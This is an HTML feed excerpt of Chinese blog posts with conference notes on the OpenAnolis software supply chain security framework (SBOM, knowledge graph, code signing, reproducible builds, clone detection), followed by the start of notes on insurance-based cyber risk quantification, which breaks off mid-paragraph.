&#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">可信任：供应链组成信息可信任；风险监控与管理可信任；软件供应链可信任<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="text-decoration: underline;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">安全体系</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">基础数据：漏洞、软件、SBOM，license<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">原子能力：单独的安全合规能力<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">功能：面向业务场景、具体业务需求的上游安全、研发过程安全、风险管理<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">产品：向社区用户提供安全能力支撑<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">安全治理：社区、行标、国标<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000352" data-ratio="0.6081871345029239" data-type="png" data-w="855" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c350b422&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUE9rEnO0R6qGk7ibYCUFzr5Ricuic7yxfVuWYx5g3ehpzy3LagFGovEFZQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">体系落地<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">安全态势洞察：我的供应链是什么，有什么风险，整体情况是什么<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">已知安全风险防护：快速修复，缩短MTTR, 被动，有了基本防护能力<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">可信生产流程：生产流程保证研发安全可信，可审计，可追溯。这是slsa最高等级，但没有定义主动防御能力，需要持续供应链演进能力。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">主动安全能力建设：主动防御能力，整体评价模型，供应链管理持续演进和迭代的能力。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000353" data-ratio="0.5818399044205496" data-type="png" data-w="837" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=82d71b3b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUNG4XYXhBz7r6tPGxbd6YicCiaVoJK4qjTj7qWEKSq4FZC9R2hrC0iaDnQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">体系参考了SLSA和S2C2F<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">推荐视频：<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">Introducing the Secure Supply Chain Consumption Framework (S2C2F) ，Adrian
Diglio, Principal PM Manager of Secure Software Supply Chain (S3C), Microsoft，{目前观看次数才百来次，还是很推荐！}<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">An Overview on SLSA， Tom Hennen, Google &amp; Joshua Lock, Vmware，{我曾吐槽顶级SLSA也不足以保证甲方供应链安全，这不郑老师说还有S2C2F，很高兴。}<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000354" data-ratio="0.5664739884393064" data-type="png" data-w="865" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=d2d77186&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUicCKuBqo9SSh5V4txoMPeNsLicqiaFFZeN6nhHZ4QKDtk56GHqHicAe8ow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">SBOM作为体系构建抓手<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img data-imgfileid="100000355" data-ratio="0.5844907407407407" data-type="png" data-w="864" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=5bfb824b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICU3Zv0fBbAM80xq299dsicNZb1sxkicFdv1ZkaxLRgKy9BicNele2dQs20A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">基础数据建设<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">上游信息包括CHAOSS指标，OSS-COMPASS模型，龙蜥实际需求，共同组成龙蜥上游健康度模型<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000356" data-ratio="1.4878048780487805" data-type="png" data-w="656" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=fe66c9a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUKkfico8LGc3fkicHNIAzaRicL4x9hsjlYvU5IiaA0PSzEVP64xictPdtQUA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">核心能力1：知识图谱<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">龙蜥sbom是3万多文件，上百万关系节点。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">采集数据，组织成图谱，利用图谱查询api，及时发现安全合规风险。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">以log4j为例，很多项目未修复，很多组件还依赖它。原因之一是企业对底层资产梳理能力不足，图谱可以可视化关系传播，影响面，影响半径，快速定位，快速修复。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">供应链安全图谱项目：谷歌发起的供应链知识图谱项目，项目地址：github.com/guacsec/guac，谷歌主导，龙蜥使用并贡献。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000357" data-ratio="0.5583815028901734" data-type="png" data-w="865" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=419838d0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUp4YOcRMgJTfkKUo8GKvNB8ibejQjcODb09u0QY7e1kUfcs9rGX1QCUQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);">核心能力2：统一签名服务<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">研发各个阶段相对离散，需要解决签名平台、秘钥、工具集等分散问题和响应的安全风险，需要向下屏蔽签名技术的复杂性，提供简单、透明、安全、高度集成的签名标准服务，让用户专注签名，不需要证书、秘钥、接口认证等复杂性。对标openssf的<a href="https://www.sigstore.dev/项目。" target="_blank">https://www.sigstore.dev/项目。</a><o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000358" data-ratio="0.5925494761350407" data-type="png" data-w="859" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=9c1b1374&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUWQp1kcK80r6wJxG3thcRfLQszymtJvrq0R8VOHcjQ9C8Y1nkpiaM5gw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">核心能力3：可重现构建<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">solarwinds事件编译构建系统被攻破，solarwinds在其下一代构建系统中，增加的可重现构建的能力。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">可重现构建能够及时发现开发者或构建系统是否被攻破,从而防患于未然,避免开发者受到威胁/胁迫。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">实现可重现构建需要三步::确保构建系统完全确定性;记录构建环境;让用户能够重建近似环境并验证编译结果是否匹配。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000359" data-ratio="0.6949941792782305" data-type="png" data-w="859" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=b7202849&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICU5MtxGj6yaJwriaURmZCfkmk8uLESWRGO6D0NiabBbFO8eZWmLlUJdPGQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000360" data-ratio="0.5336426914153132" data-type="png" data-w="862" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=fd5affe1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUxoHsk2KsR926uMecsjCLBrPicibibQwbru8Kcn4nibGPZaHQdt494xxXKA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">核心能力4：大规模代码克隆检测<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1 谷歌、openjdk专利诉讼。谷歌引用了openjdk9行代码和api，是否天价赔偿？<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2 连续修复5-6个netfilter cve问题，细究发现编码风格是高度一致，再深入分析发现都是同一个人写得代码。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">代码克隆检测能力，再往上做安全检查能力。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">和复旦大学进行学术合作，主要是SAGA代码克隆检测工具，源码比对和识别，克隆检测后处理。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000361" data-ratio="0.5993071593533488" data-type="png" data-w="866" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=47325e80&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUQhm2vAX1phaqUPqM3sPg9tHy1yJSktK4chAdleGstXIejznp2nEJaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(46, 117, 181);">核心能力5：AI for代码安全<o:p></o:p></span></h2><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">借助大模型，发现源码里面是否有安全风险。<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">可疑代码抽取，大模型判断分析，缺陷诊断能力<o:p></o:p></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p><img class="rich_pages wxw-img" data-imgfileid="100000362" data-ratio="0.5985997666277713" data-type="png" data-w="857" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=d29f1283&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUop4Y6Q7eCtE2TMvK3OKM54TNXgVDR2kpEC0nmRTDBjY8ia0jnxt12icA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></o:p></span></p><h2 style="margin:0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;">未来规划<o:p></o:p></span></h2><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(39, 98, 150);font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000363" data-ratio="0.6764361078546307" data-type="png" data-w="853" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=82d00e2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzpt1kePfzbn8tSCor7SICUibbEjmglbSr4TyuSMfib9e6h3qtiakHG25QytISO4tUXw8KrHwNiaOZ7UA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><ul style="list-style: none;" type="disc" class="list-paddingleft-1"><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">基础数据完善<o:p></o:p></span></p></li><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">安全能力建设<o:p></o:p></span></p></li><ul style="margin-top:0cm;" type="circle" class="list-paddingleft-1"><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">工具评价分析，攻击面管理能力<o:p></o:p></span></p></li><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">漏洞利用、防御、环节能力，减少漏洞影响面<o:p></o:p></span></p></li><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">全生命周期知识图谱，加入流转信息<o:p></o:p></span></p></li><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;">服务能力开源<o:p></o:p></span></p></li><li style="color: black;vertical-align: middle;font-size: 14px;"><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">AI结合探索<o:p></o:p></span></p></li></ul></ul><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-size: 14px;"><span style="text-decoration: underline;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">提问：是否要用知识图谱</span><span lang="EN-US" style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;"><o:p></o:p></span></span></p><p style="margin-right: 0cm;margin-left: 0cm;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">使用知识图谱，有一些好处。例如：便于影响面分析，爆炸半径分析；识别软件生态核心组件，引导关键组件更大投入；合规相关的能力，证书污染，影响半径是什么，如何去修复；软件升级和修复策略，依赖的版本v1升到v2，升级影响分析；底层使用阿里云图数据库。<o:p></o:p></span></p><p style="margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484014">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=1801490b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484014%26idx%3D1%26sn%3D138ebb90548ecf62013dd32d25b8fe7a%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 29 Mar 2024 07:08:00 +0800</pubDate>
    </item>
    <item>
      <title>如何量化网络安全风险？学一学精算师是怎么做的！</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483963&amp;idx=1&amp;sn=0a90b8cb98498d12d22835c0d28424cf</link>
      <description>上海网络安全产业创新大会，网络安全保险与供应链安全分会，保险视角下的网络安全风险。</description>
      <content:encoded><![CDATA[<p>
<span>普罗米修斯</span> <span>2024-03-05 22:09</span> <span style="display: inline-block;">上海</span>
</p>

<p>上海网络安全产业创新大会，网络安全保险与供应链安全分会，保险视角下的网络安全风险。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=01431928&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlic0VIsWNMuF5HHWwL0VbX8Epp2LogEqEBzCsEjBXtme4TXejdYw4zIrQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2月28日下午，我参加了上海网络安全产业创新大会的网络安全保险与供应链安全分会。原本是冲着供应链安全技术分享去的，但现场与一般技术论坛不同，<span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">整个会</span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;, sans-serif;font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">场汇集了保险、科技、安全等各种角色的人，</span></span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(255, 0, 0);">强烈感受到了跨界的氛围</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">。<o:p></o:p></span></p><section style="margin-bottom: 0px;"><span style="font-size: 14px;">在分会中,一场题为《保险视角下的网络安全风险》的分享给我留下了深刻印象。演讲者提出了一种综合性的网安风险量化模型,旨在回答网安人员一直被反复询问的业务影响问题。这种模型应当具备以下几个关键特征:<span style="color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;letter-spacing: 0.034em;">：</span></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><section style="margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">时间动态建模<o:p></o:p></span></section></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><section style="margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">事件分类管理<o:p></o:p></span></section></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><section style="margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">融入意识差异因素<o:p></o:p></span></section></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><section style="margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">技术与非技术双因子<o:p></o:p></span></section></li><li style="color: black;text-align: left;vertical-align: middle;font-size: 14px;"><p style="margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;">案例理论双向支撑</span></p></li></ul><p><span style="font-size: 14px;color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;letter-spacing: 0.034em;">短短30分钟的分享，启迪我对数字化实践进行反思：既然数字化的第一步是获取全量、全要素的数据,那我们若能虚怀若谷,打破思维壁垒,在数据建模过程中,</span><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;letter-spacing: 0.034em;color: rgb(255, 0, 0);">融入精算师、数学家、业务人员、用户等不同视角的专业见解</span><span style="font-size: 14px;color: black;font-family: &#34;微软雅黑 Light&#34;, sans-serif;letter-spacing: 0.034em;">,考虑更全方位的因素,定能真正发掘数据中蕴含的价值洞见。</span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">感谢大会邀请的讲者，感谢提供一次望其项背的机会。<o:p></o:p></span></p><p><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">*以下内容根据笔记整理，错误疏漏难免，具体内容以现场演讲为准！<o:p></o:p></span></p><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;"><img class="rich_pages wxw-img" data-imgfileid="100000296" data-ratio="0.6556991774383079" data-type="png" data-w="851" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=597c9e89&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINxhaGk6ypSZEM7pC1orRdlicQqddTQ9BUUJvZh3aCXmPYFicS20ZD2p4TbEibMAGjknXV7O4oR4dlNXA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><section style="margin-bottom: 0px;"><span style="font-size: 16px;">一、网安保险和网安防护的风险量化需要桥梁</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （一）保险业务视角下的网安</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （二）需要模型来缝合保险和网安</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （三）站在巨人的肩膀上</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">二、创新性网安保险风险量化模型 </span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （一）时间动态风险建模</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        1 网安是一个大产业</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        2 模型就是要创造融合各方视角的奇迹</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        3 如何量化未知的未知？</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        4 如何让预算更有效地起到作用</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        5 时间是网络安全的本质</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        6 网络攻击的瞬时和累积危险率模型</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        7 模型的直观示例</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （二）事件分类与专业数据库</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        1 需要分事件类别进行建模</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        2 专有数据库为模型提供了数据支撑</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        3 模型的直观示例</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （三）意识差异反诈骗量化</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        1 诈骗和反诈就是意识的不平衡倾斜</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        2 模型的直观示例</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （四）技术与非技术双因子</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        1 起码要考虑两种风险因子</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        2 风险因子的直观示例</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">    （五）案例驱动理论创新和验证 </span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        1 模型的直观示例</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        2 模型的要求和挑战</span></section><section style="margin-bottom: 0px;"><span style="font-size: 14px;">        3 首单网安保险案例</span></section><section style="margin-bottom: 0px;"><span style="font-size: 16px;">三、王教授寄语</span></section><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;"><br/></p><p><span style="font-size: 20px;"><strong style="font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: rgb(20, 50, 77);">一、网安保险和网安防护的风险量化需要桥梁</span></strong></span></p><table cellspacing="0" cellpadding="0" title="" summary=""><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td width="550" valign="top" style="border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 4pt;word-break: break-all;"><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 14px;">唐涵喆先生发言的要点：<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">1. 网安保险的风险量化与网络安全防护的量化是两个不同的东西。安全量化是保险量化的重要组成部分,但不能代替保险风险量化。<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">2. 保险行业想要的量化结果与安全行业的测评结果不同,保险行业习惯自己的语言和方法。安全事件的发生大多不是单一的安全防护因素决定的,需要从保险行业的角度用它们更能理解的逻辑来解释安全。<o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 14px;font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;">3. 网络安全保险科技公司,要连接保险业和安全业，要构建保险行业和安全行业之间的桥梁,做语言和数字的翻译,服务保险行业的应用需求。<o:p></o:p></span></p></td></tr></tbody></table><p><span style="font-family: &#34;微软雅黑 Light&#34;, sans-serif;color: black;font-size: 